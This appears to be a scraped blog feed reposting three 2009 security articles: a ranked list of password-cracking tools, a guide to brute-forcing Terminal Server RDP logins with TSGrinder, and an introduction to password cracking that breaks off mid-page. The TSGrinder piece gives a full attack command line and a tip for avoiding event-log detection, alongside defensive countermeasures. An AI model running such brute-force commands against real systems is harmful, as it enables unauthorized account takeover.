Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-90052221781212575912009-07-29T05:12:00.000-07:002009-07-29T05:23:50.200-07:00Top 10 Password Crackers<p>After the tremendously successful <a href="http://sectools.org/tools2000.html">2000</a> and <a href="http://sectools.org/tools2003.html">2003</a> security tools surveys, <a href="http://www.insecure.org/">Insecure.Org</a> is delighted to release this 2006 survey. I (<a href="http://insecure.org/fyodor/">Fyodor</a>) asked users from the <a href="http://seclists.org/#nmap-hackers">nmap-hackers</a> mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. <b>This is the category page for password crackers</b> -- the full network security list is <a href="http://sectools.org/index.html">available here</a>. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also point newbies to this site whenever they write me saying “I don't know where to start”. </p><p>Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the <a href="http://insecure.org/nmap/">Nmap Security Scanner</a> were counted because the survey was taken on a Nmap mailing list. This audience also biases the list slightly toward “attack” hacking tools rather than defensive ones. </p><p>Each tool is described by one ore more attributes: <table> <tbody><tr><td align="center"><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" title="New" width="28" height="11" /></td><td valign="center">Did not appear on the <a href="http://sectools.org/tools2003.html">2003 list</a></td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /></td><td valign="center">Generally costs money. A free limited/demo/trial version may be available.</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /></td><td valign="center">Works natively on Linux</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /></td><td valign="center">Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /></td><td valign="center">Works natively on Apple Mac OS X</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /></td><td valign="center">Works natively on Microsoft Windows</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /></td><td valign="center">Features a command-line interface</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /></td><td valign="center">Offers a GUI (point and click) interface</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /></td><td valign="center">Source code available for inspection.</td></tr> </tbody></table> </p>Please send updates and suggestions (or better tool logos) to <a href="mailto:fyodor@insecure.org">Fyodor</a>. If your tool is featured or you think your site visitors might enjoy this list, you are welcome to use our <a href="http://sectools.org/banners.html">link banners</a>. Here is the list, starting with the most popular:<br /><br /><span style="font-size:+1;">#1</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> <a href="http://www.oxid.it/cain.html"><img src="http://mirror.sectools.org/logos/cain-80x32.png" align="right" border="0" width="80" height="32" /></a> <a href="http://www.oxid.it/cain.html">Cain and Abel</a> : The top password recovery tool for Windows<br />UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. It is also <a href="http://www.oxid.it/ca_um/">well documented</a><br /><br /><span style="font-size:+1;">#2</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> <a href="http://www.openwall.com/john/"><img src="http://mirror.sectools.org/logos/john-80x163.png" align="right" border="0" width="80" height="163" /></a> <a href="http://www.openwall.com/john/">John the Ripper</a> : A powerful, flexible, and <i>fast</i> multi-platform password hash cracker<br />John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find <a href="ftp://ftp.mirrorgeek.com/openwall/wordlists">here</a>, <a href="ftp://ftp.ox.ac.uk/pub/wordlists/">here</a>, or <a href="http://www.outpost9.com/files/WordLists.html">here</a>. <br /><br /><span style="font-size:+1;">#3</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> <a href="http://www.thc.org/thc-hydra/"><img src="http://mirror.sectools.org/logos/hydra-80x79.png" align="right" border="0" width="80" height="79" /></a> <a href="http://www.thc.org/thc-hydra/">THC Hydra</a> : A Fast network authentication cracker which supports many different services<br />When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like <a href="http://sectools.org/index.html#amap">THC Amap</a> this release is from the fine folks at <a href="http://www.thc.org/">THC</a>. <br /><br /><span style="font-size:+1;">#4</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> <a href="http://www.aircrack-ng.org/"><img src="http://mirror.sectools.org/logos/aircrack-80x63.png" align="right" border="0" width="80" height="63" /></a> <a href="http://www.aircrack-ng.org/">Aircrack</a> : The fastest available WEP/WPA cracking tool<br />Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).<br /><br /><span style="font-size:+1;">#5</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> <a href="http://www.l0phtcrack.com/"><img src="http://mirror.sectools.org/logos/l0phtcrack-64x64.gif" align="right" border="0" width="64" height="64" /></a> <a href="http://www.l0phtcrack.com/">L0phtcrack</a> : Windows password auditing and recovery application<br />L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, then re-acquired by the original L0pht guys and <a href="http://www.l0phtcrack.com/">reborn as LC6 in 2009</a>. For free alternatives, consider <a href="http://ophcrack.sourceforge.net/">Ophcrack</a>, <a href="http://sectools.org/crackers.html#cain">Cain and Abel</a>, or <a href="http://sectools.org/crackers.html#john">John the Ripper</a>. <br /><br /><span style="font-size:+1;">#6</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> <a href="http://airsnort.shmoo.com/"><img src="http://mirror.sectools.org/logos/airsnort-80x41.png" align="right" border="0" width="80" height="41" /></a> <a href="http://airsnort.shmoo.com/">Airsnort</a> : 802.11 WEP Encryption Cracking Tool<br />AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the <a href="http://www.shmoo.com/">Shmoo Group</a> and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar <a href="http://sectools.org/crackers.html#aircrack">Aircrack</a>. <p>Also categorized as: <a href="http://sectools.org/wireless.html">wireless tools</a></p><p><br /></p><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#7</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.solarwinds.net/"><img src="http://mirror.sectools.org/logos/solarwinds-80x47.png" align="right" border="0" width="80" height="47" /></a> <a href="http://www.solarwinds.net/">SolarWinds</a> : A plethora of network discovery/monitoring/attack tools<br />SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more. <p>Also categorized as: <a href="http://sectools.org/traffic-monitors.html">traffic monitoring tools</a> </p></td></tr></tbody></table><hr /><a name="pwdump"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#8</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.foofus.net/fizzgig/pwdump/">Pwdump</a> : A window password recovery tool<br />Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file. </td></tr></tbody></table><hr /><a name="rainbowcrack"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#9</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.antsight.com/zsl/rainbowcrack/">RainbowCrack</a> : An Innovative Password Hash Cracker<br />The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. </td></tr></tbody></table><hr /><a name="brutus"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#10</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.hoobie.net/brutus/">Brutus</a> : A network brute-force authentication cracker<br />This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at <a href="http://sectools.org/crackers.html#hydra">THC Hydra</a>. </td></tr></tbody></table><p> </p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-52259671139037653502009-07-29T05:06:00.000-07:002009-07-29T05:12:14.357-07:00Brute Force Hacking In Terminal Server Environments<p id="article-anonce">One of the most common techniques used by hackers to penetrate your network, is just plain-old password guessing. This goes for external hacking attempts as well as internal hacking attempts. In this article I will discuss how hackers can use tools to perform brute force password hacking in your Terminal Server environments and what you can to prevent these kinds of attacks.</p> <h2>Introduction</h2> <p>Guessing passwords is one of the oldest, yet one of the most effective techniques to gain access to a system. The reason that it is one of the most effective hacking techniques is because there’s a weak link in the whole process: humans. This is because humans like “samantha1” better for a password than “Tr15%^<<lopi>!+”. Although the latter would be far more difficult to hack than the first password, there’s a good chance that no user would ever get the latter password memorized.</p> <p>This is what hackers take advantage of. The only thing a hacker needs is a logon “vehicle”. This could be a command prompt, a web page or… the Microsoft Remote Desktop Connection conveniently included in every recent version of Windows or readily available from Microsoft’s download site.</p> <h2>Hacking Slang</h2> <p>For clarity’s sake, I’ll briefly discuss some of the terms used in relation to password hacking. Basically, there are two kinds of password hacking attacks:</p> <ul><li>Brute force hacking a.k.a. dictionary hacking attacks </li><li>Password cracking a.k.a hash hacking attacks.</li></ul> <p>In this article we will be focusing on brute force hacking, using dictionary attacks. This simply means that the hacker will use a tool to automate the password guessing with an accompanying dictionary file: a file that contains every single password the hacker wants to try. Usually there are tens of thousands of passwords in a dictionary file and the hacking tool tries them all, pounding the server with logon attempts: hence the term brute force hacking.</p> <h2>Impact Of Password Guessing in Terminal Server environments</h2> <p>As in other fields of security, Terminal Server environments take up a special place. This is because Terminal Servers, by their very nature, allow interactive access. Interactive access in this context means that you’re logged on to the server itself. This is the same effect as if you were walking up to the console in the datacenter and logging on there. This basically allows you to execute any program you can get your hands on and run it in the memory space of that server.</p> <p>Another significant issue that arises from the fact that Terminal Servers are in the business of allowing interactive access, is an issue with the admin lockout. As you probably know, by default, the local administrator account cannot be locked out. Even if you use the passprop utility, you can only lock out the administrator account for remote logons, not interactive (Terminal Server logons). Only using passprop on Windows Server 2003 allows you to lock out the local administrator account. Because this could effectively completely lock you out of your own network, this isn’t a configuration that is used a lot. Hackers know this and use this knowledge to perform brute force hacking attempts on administrator accounts.</p> <h2>Terminal Server Brute Force Hacking tool: TSGrinder</h2> <div class="Section2"> <p>There are a couple of tools out there which allow you to perform brute-force password guessing in your Terminal Server environment. The most well-known however is a free tool called <a href="http://www.hammerofgod.com/download/tsgrinder-2.03.zip" target="_blank"><strong>TSGrinder</strong></a>. TSGrinder is a command line tool which very basically allows automating password guessing via RDP connections. TSGrinder is a "dictionary" based attack tool, supports multiple attack windows from a single dictionary file (you can specify this on the program command line). </p> <p>A very interesting option in the program is the “leet” function. This leet function enables the program to cope with a popular development in password-land. What I mean is that, from the knowledgeable user up, people tend to secure their passwords by replacing letters with well-known symbols. For example, password becomes p@ssw0rd (replacing a’s with @’s and o’s with 0’s). This is a very well thought thorough option because as we will see trying these passwords does not require you to change your dictionary file. </p> <p>Another very interesting option is the “banner” option. What this option does, is acknowledge any messages prior to log on. These are the kind of messages that you have to acknowledge before you can log on to a server, usually a legal disclaimer of some sort. This logon message can be set in Group Policy in Computer Policies > Security Settings > Local Policies > Security Settings > Interactive Logon. </p> <p>This was an issue in earlier versions of TSGrinder but that has been fixed now. This option basically renders the banner message useless as a countermeasure to these kinds of attacks. </p> <p>TSGrinder also supports multiple password attempts in the same connection, and allows you to specify how many times to try a username/password combination within a particular connection (the default is 5) . This is used by hackers to help avoiding detection, because by default after 5 unsuccessful logon attempts, the Terminal Server ends the connection and an event is logged to the Terminal Server event log. The event looks like this:</p></div> <blockquote dir="ltr"> <p><img alt="" src="http://www.msterminalservices.org/img/upl/image0021153396955524.jpg" align="baseline" border="0" hspace="0" /></p></blockquote> <p>So in the default config of TSGrinder you could have someone trying about 1,000,000 passwords and there would not be a single event in the event log (auditing excluded, we’ll get to that).</p> <p>Let’s take a look at TSGrinder. The program comes with a very limited dictionary and leet file. You can be sure that hackers have far more advanced dictionaries. Running TSGrinder from the command line yields the help:<br /><br /></p> <blockquote dir="ltr" style="margin-right: 0px;"> <p dir="ltr"> </p><table border="1" cellpadding="0" cellspacing="0"> <tbody> <tr> <td valign="top" width="590"> <p><b>Usage:</b></p> <p><b> tsgrinder.exe [options] server</b></p> <p> </p> <p><b>Options:</b></p> <p><b> -w dictionary file (default 'dict')</b></p> <p><b> -l 'leet' translation file</b></p> <p><b> -d domain name</b></p> <p><b> -u username (default 'administrator'</b></p> <p><b> -b banner flag</b></p> <p><b> -n number of simultaneous threads</b></p> <p><b> -D debug level (default 9, lower number is more output)</b></p> <p> </p> <p><b>Example:</b></p> <p><b> tsgrinder.exe -w words -l leet -d workgroup -u administrator -b -n 2 10.1.1.1</b></p></td></tr></tbody></table></blockquote> <p>As you can see usage is pretty straight-forward. You can try it on your own test server, just like I did. </p> <blockquote dir="ltr" style="margin-right: 0px;"> <p dir="ltr"> </p><table border="1" cellpadding="0" cellspacing="0"> <tbody> <tr> <td width="590"> <p align="center"><b>Disclaimer</b>: Use extreme caution when using this tool. Using TSGrinder could result in legal actions taken against you because your actions could be considered a real hacking attempt.</p></td></tr></tbody></table></blockquote> <p>In this very simple example we will assume that:</p> <ul><li>we have a dictionary file called “testdict” </li><li>we have a leetfile called “testleet” </li><li>the username we are attacking is the default, administrator </li><li>we want to acknowledge any logon banner messages </li><li>we want to have 1 simultaneous thread </li><li>the server we are attacking has the following IP address: 192.168.62.53</li></ul> <p>That would leave us with the following command line: </p> <blockquote dir="ltr" style="margin-right: 0px;"> <p><i>tsgrinder.exe -w testdict -l testleet -b -n 1 -D 8 192.168.62.53</i></p></blockquote> <p>As you can see in the screenshot below, after a while, tsgrinder neatly finds that I’ve been using P@55w0rd! as my administrator password. It’s that easy.</p> <blockquote dir="ltr"> <p><img alt="" src="http://www.msterminalservices.org/img/upl/image0041153397962524.jpg" align="baseline" border="0" hspace="0" /></p></blockquote> <h2>Countermeasures</h2> <p>OK, now that you’ve seen how easy it is to attack your Terminal Server environment, it’s time to take countermeasures. Here are some concrete suggestions that can help prevent these kinds of attacks.</p> <p><strong>Rename administrator account</strong></p> <p>You should know that renaming the administrator account is considered a best practice. If you were not aware of that earlier, I sure hope you are now. When you rename the (local) administrator account, the hacker cannot use the administrator account to attack and must know the exact name of the renamed administrator account. This also has the added advantage that you can create a dummy administrator account that <i>can</i> be locked out (you do have account lock outs configured, right?)</p> <p><strong>Connection Security</strong></p> <p>Ideally you would want to make sure that users are already somehow checked <i>before</i> they attempt to logon to a Terminal Server. This used to be a huge hassle but now there’s a free tool available that does just that and more! The tool is called <a href="http://www.2x.com/securerdp/" target="_blank"><strong>2X SecureRDP</strong></a>. 2X SecureRDP works by accepting or denying incoming RDP connections by IP, Mac address, computer name, client version or based on time of day, before the logon screen is even displayed. This significantly enhances the control you have over your Terminal Servers. As an added bonus you can limit users to one concurrent session. This doesn’t really prevent brute force attacks from happening but it’s a very nice feature that I know many administrators are looking for. Another great feature of this program is that you can log information for every allowed or denied connection and save it to a log file. Below is a screenshot of 2X SecureRDP.</p> <blockquote dir="ltr"> <p><img alt="" src="http://www.msterminalservices.org/img/upl/image0061153397962524.jpg" align="baseline" border="0" hspace="0" /></p></blockquote> <p>Of course, this tool is not just for Terminal Servers,. It greatly suits every server you access via RDP. In fact, I recommend using this tool on every RDP enabled server.</p> <p><strong>Auditing</strong></p> <p>Enable extensive auditing. OK, so this doesn’t <i>prevent</i> brute force attacks from happening but at the very least it allows you too log these kinds of attacks. You should audit successful and failed logons events. Because these audit logs tend to get cluttered very soon on a busy server, you should consider an automated audit tool. These kinds of tools monitor and filter the security event logs for you so that you can see what you need to see and be alerted when anything goes bad. An example and my personal favorite of such a program is <a href="http://www.gfi.com/lanselm/" target="_blank"><strong>SELM</strong></a> (Security Event Log Monitor) from GFI. See a list of well-known similar programs <a href="http://www.windowsecurity.com/software/Event-Log-Monitoring/" target="_blank"><strong>here</strong></a>.</p> <p><strong>Logon Message</strong></p> <p dir="ltr">You should configure all of your servers to display a message at logon that must be acknowledged before you can proceed to log on to a server. This really isn’t a technical countermeasure but more of a legal one. Once you’ve acknowledged the logon message, there’s no way the perp can say: “I had no idea I wasn’t supposed to log on to that server”……..</p> <blockquote dir="ltr"> <p dir="ltr"><img alt="" src="http://www.msterminalservices.org/img/upl/image0081153397962524.jpg" align="baseline" border="0" hspace="0" /></p></blockquote> <h2 dir="ltr">Conclusion</h2> <p>Terminal Server environments are juicy targets for hackers. In this article I showed some techniques hackers can use to perform brute force attacks against local administrator accounts. I also showed you what you can do to prevent these attacks. Please keep in mind that these are just pointers and only make up a small part of the steps you should take to secure your Terminal Server environment.</p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-29017721019845527652009-07-29T05:03:00.000-07:002009-07-29T05:06:29.295-07:00Hacking techniques Introduction to password cracking<blockquote>Password and user account exploitation is one of largest issues in network security. In this article Rob Shimonski will look at password cracking: the how and why of it. Rob will explain just how easy it is to penetrate a network, how attackers get in, the tools they use, and ways to combat it.</blockquote><!--START RESERVED FOR FUTURE USE INCLUDE FILES--><script type="text/javascript" language="javascript"> // <![CDATA[ capture_referrer(); // ]]> </script> <!-- START : HTML FOR SEARCH REFERRER --> <div id="search_referrer_results" style="display: none;"> <!-- START : HTML FOR ARTICLE SEARCH --> <!-- END : HTML FOR ARTICLE SEARCH --> <!-- START : HTML FOR CODE SEARCH --> <!-- END : HTML FOR CODE SEARCH --> <br /> <br /> </div> <!-- END : HTML FOR SEARCH REFERRER --><!--END RESERVED FOR FUTURE USE INCLUDE FILES--><p>Attacks on a company or organization's computer systems take many different forms, such as spoofing, smurfing, and other types of Denial of Service (DoS) attacks. These attacks are designed to harm or interrupt the use of your operational systems. This article deals with a single wide-spread form of attack known as <i>password cracking</i>.</p><p>Password cracking is a term used to describe the penetration of a network, system, or resource with or without the use of tools to unlock a resource that has been secured with a password. In this article I will take a look at what password cracking is, why attackers do it, how they achieve their goals, and what you can do to do to protect yourself. I will briefly take a look at the attackers themselves: their psychological makeup and their motives. Through an examination of several scenarios, I will describe some of the techniques they deploy and the tools that aid them in their assaults, and how password crackers work both internally and externally to violate a company's infrastructure. Finally, the article provides a checklist to help protect you from password cracking.</p><p>Before exploring the methods for doing this, let's first peer into the mind of the attacker and learn why they might want access to your network and systems.</p><p><a name="h1"><span class="atitle">Attackers: how and why they attack</span></a></p><p> There is an on-going debate about the definition of the word <i>hacker</i>. A hacker can be anyone with a deep interest in computer-based technology; it does not necessarily define someone who wants to do harm. The term <i>attacker</i> can be used to describe a malicious hacker. Another term for an attacker is a <i>black hat</i>. Security analysts are often called <i>white hats</i>, and <i>white-hat analysis</i> is the use of hacking for defensive purposes.</p><p>Attackers' motivations vary greatly. Some of the most notorious hackers are high school kids in their basements planted in front of their computers looking for ways to exploit computer systems. Other attackers are disgruntled employees seeking revenge on a company. And still other attacks are motivated by the sheer challenge of penetrating a well-secured system.</p><br /><table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><img src="http://www.ibm.com/i/v14/rules/blue_rule.gif" alt="" width="100%" height="1" /></td></tr></tbody></table><table class="no-print" align="right" cellpadding="0" cellspacing="0"><tbody><tr align="right"><td><table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td valign="middle"><br /></td><td align="right" valign="top"><a href="http://www.ibm.com/developerworks/library/s-crack/index.html#main" class="fbox"><b></b></a><br /></td></tr></tbody></table></td></tr></tbody></table><br /><br /><p><a name="h1"><span class="atitle">Methods of attack</span></a></p><p> Password cracking doesn't always involve sophisticated tools. It can be as simple as finding a sticky note with the password written on it stuck right to the monitor or hidden under a keyboard. Another crude technique is known as "dumpster diving," which basically involves an attacker going through your garbage to find discarded documentation that may contain passwords.</p><p>Of course attacks can involve far greater levels of sophistication. Here are some of the more common techniques used in password cracking: </p><ul><li> <b>Dictionary attack</b><br />A simple <i>dictionary</i> attack is by far the fastest way to break into a machine. A dictionary file (a text file full of dictionary words) is loaded into a cracking application (such as L0phtCrack), which is run against user accounts located by the application. Because the majority of passwords are often simplistic, running a dictionary attack is often sufficient to to the job.</li><li> <b>Hybrid attack</b><br />Another well-known form of attack is the <i>hybrid</i> attack. A hybrid attack will add numbers or symbols to the filename to successfully crack a password. Many people change their passwords by simply adding a number to the end of their current password. The pattern usually takes this form: first month password is "cat"; second month password is "cat1"; third month password is "cat2"; and so on.</li><li> <b>Brute force attack</b><br />A <i>brute force</i> attack is the most comprehensive form of attack, though it may often take a long time to work depending on the complexity of the password. Some brute force attacks can take a week depending on the complexity of the password. L0phtcrack can also be used in a brute force attack.</li></ul><p> </p><p>Next, take a look at some of the tools attackers use to break into a system.</p><br /><table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><img src="http://www.ibm.com/i/v14/rules/blue_rule.gif" alt="" width="100%" height="1" /></td></tr></tbody></table><table class="no-print" align="right" cellpadding="0" cellspacing="0"><tbody><tr align="right"><td><table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td valign="middle"><img src="http://www.ibm.com/i/v14/icons/u_bold.gif" alt="" border="0" width="16" height="16" /><br /></td><td align="right" valign="top"><a href="http://www.ibm.com/developerworks/library/s-crack/index.html#main" class="fbox"><b>Back to top</b></a></td></tr></tbody></table></td></tr></tbody></table><br /><br /><p><a name="h1"><span class="atitle">Tools of the trade</span></a></p><p> One of the most popular tools is <b>L0phtCrack</b> (now called LC4). L0phtCrack is a tool that allows an attacker to take encrypted Windows NT/2000 passwords and convert them to plaintext. NT/2000 passwords are in cryptographic hashes and cannot be read without a tool like L0phtCrack. It works by attempting every alphanumeric combination possible to try to crack passwords.</p><p>Another commonly-used tool is a protocol analyzer (better known as a network sniffer, such as Sniffer Pro or Etherpeek), which is capable of capturing every piece of data on the network segment to which it is attached. When such a tool is running in <i>promiscuous mode</i>, it can "sniff" everything going around on that segment such as logins and data transfers. As you'll see later, this can seriously damage network security allowing attackers to capture passwords and sensitive data.</p><p>Let's take a look at a few scenarios and examine how attackers launch their attacks and how they might be stopped or prevented. I'll first describe a couple of scenarios involving internal attacks (that is, attacks that originate within an organization), and then take a look at a couple of scenarios involving external attacks.</p><br /><table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><img src="http://www.ibm.com/i/v14/rules/blue_rule.gif" alt="" width="100%" height="1" /></td></tr></tbody></table><table class="no-print" align="right" cellpadding="0" cellspacing="0"><tbody><tr align="right"><td><table style="width: 6px; height: 